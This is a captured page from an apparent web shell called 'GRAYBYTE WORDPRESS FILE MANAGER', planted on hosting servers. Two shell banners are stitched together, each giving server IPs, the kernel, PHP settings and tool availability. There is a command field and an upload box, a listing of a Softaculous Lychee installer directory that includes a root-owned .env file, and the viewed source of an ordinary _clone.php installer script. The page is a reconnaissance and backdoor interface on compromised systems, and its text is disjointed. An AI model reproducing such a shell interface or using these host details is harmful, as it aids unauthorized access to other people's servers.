GRAYBYTE WORDPRESS FILE MANAGER2696

Server IP : 192.250.235.76 / Your IP : 45.90.210.12
System : Linux s2968.sgp1.stableserver.net 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
PHP Version : 8.2.29
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF

HOME

/home/tawsifschoice/borkaa.tawsifschoice.com/
1902120114081995

GRAYBYTE WORDPRESS FILE MANAGER5670

Server IP : 198.54.116.172 / Your IP : 216.73.216.36
System : Linux server322.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
PHP Version : 7.4.33
Disable Function : mail
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF

HOME

/var/softaculous/lychee/
Upload Files :
Current_dir [ Not Writeable ] Document_root [ Writeable ]

Command :


Current File : /var/softaculous/lychee//_clone.php
<?php

//////////////////////////////////////////////////////////////
//===========================================================
// clone.php
//===========================================================
// SOFTACULOUS 
// Version : 4.2.8
// Inspired by the DESIRE to be the BEST OF ALL
// ----------------------------------------------------------
// Started by: Alons
// Date:       10th Jan 2009
// Time:       21:00 hrs
// Site:       http://www.softaculous.com/ (SOFTACULOUS)
// ----------------------------------------------------------
// Please Read the Terms of use at http://www.softaculous.com
// ----------------------------------------------------------
//===========================================================
// (c)Softaculous Inc.
//===========================================================
//////////////////////////////////////////////////////////////

if(!defined('SOFTACULOUS')){

	die('Hacking Attempt');

}

//The Install process
function __clone(){

global $__settings, $error, $software, $globals, $replace_data, $source_data;
	
	//Do we meet the Minimum software requirements
	__requirements();
	
	if(!empty($error)){
		return false;
	}
	
	$temp = parse_url($source_data['softurl']);
	$source_data['relativeurl'] = $temp['path'];
	
	$temp = parse_url($__settings['softurl']);
	$__settings['relativeurl'] = $temp['path'];
	
	// config.php	
	$file = sfile($__settings['softpath'].'/data/config.php');
	
	if(empty($file)){
		$error[] = 'Could not read the config file to get the dbprefix.';
		return false;
	}
	
	soft_preg_replace('/\$dbTablePrefix(\s*?)=(\s*?)("|\')(.*?)("|\')/is', $file, $__settings['dbprefix'], 4);
	
	sclone_replace($replace_data, $__settings['softpath'].'/data/config.php', true);
	
	//sql
	$__settings['identifier'] = md5(microtime(true));
	$query = "UPDATE `".$__settings['dbprefix']."_lychee_settings` SET `value`='".$__settings['identifier']."' WHERE `key` = 'identifier';";
	sdb_query($query, $__settings['softdbhost'], $__settings['softdbuser'], $__settings['softdbpass'], $__settings['softdb']);
		
	if(sfile_exists($__settings['softpath'].'/.htaccess')){
	
		// If the installation is on root domain we need to change the below relative URL
		if(is_dom_root($source_data['softpath'])){
			$replace_data['RewriteBase \'/\''] = 'RewriteBase \''.$__settings['relativeurl'].'\'';
			$replace_data['RewriteBase /'] = 'RewriteBase '.$__settings['relativeurl'];
		}elseif(is_dom_root($__settings['softpath'])){
			$replace_data['RewriteBase \''.$source_data['relativeurl'].'\''] = 'RewriteBase \'/\'';
			$replace_data['RewriteBase '.$source_data['relativeurl']] = 'RewriteBase /';
		}
		
		sclone_replace($replace_data, $__settings['softpath'].'/.htaccess', true);		
	}
	
	// CHMOD some files
	@schmod($__settings['softpath'].'/uploads/', $globals['odc'], 1);
}

//Check whether the Minimum Software configuration matches
function __requirements(){

global $__settings, $error, $software;
	
	return true;

}

?>

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
January 11 2026 11:30:19
root / root
0755
images
--
January 03 2026 11:29:49
root / root
0755
php53
--
January 03 2026 11:29:49
root / root
0755
php56
--
January 03 2026 11:29:49
root / root
0755
php71
--
January 03 2026 11:29:49
root / root
0755
php81
--
January 03 2026 11:29:49
root / root
0755
php82
--
January 03 2026 11:29:49
root / root
0755
.env
9.24 KB
January 02 2026 07:38:16
root / root
0644
.htaccess
0.306 KB
January 05 2023 10:07:36
root / root
0644
_clone.php
2.898 KB
December 23 2021 11:54:36
root / root
0644
_edit.php
4.527 KB
December 23 2021 11:54:36
root / root
0644
_edit.xml
0.423 KB
December 23 2021 11:54:36
root / root
0644
_upgrade.php
3.198 KB
August 09 2022 09:24:30
root / root
0644
_upgrade.xml
0.568 KB
August 09 2022 09:24:30
root / root
0644
changelog.txt
5.711 KB
January 02 2026 07:38:16
root / root
0644
extend.php
9.933 KB
January 02 2026 11:33:40
root / root
0644
fileindex.php
0.221 KB
December 26 2022 11:09:42
root / root
0644
import.php
4.052 KB
January 02 2026 11:33:40
root / root
0644
info.xml
4.595 KB
January 02 2026 07:38:16
root / root
0644
install.js
0.902 KB
December 23 2021 11:54:36
root / root
0644
install.php
5.548 KB
January 02 2026 11:33:40
root / root
0644
install.xml
0.438 KB
December 23 2021 11:54:36
root / root
0644
lychee.sql
112.153 KB
January 02 2026 07:38:16
root / root
0644
lychee.zip
28.93 MB
January 02 2026 07:38:16
root / root
0644
md5
1.207 KB
January 02 2026 11:33:40
root / root
0644
notes.txt
1.577 KB
June 13 2025 05:46:16
root / root
0644
update_pass.php
0.598 KB
September 05 2022 11:24:20
root / root
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF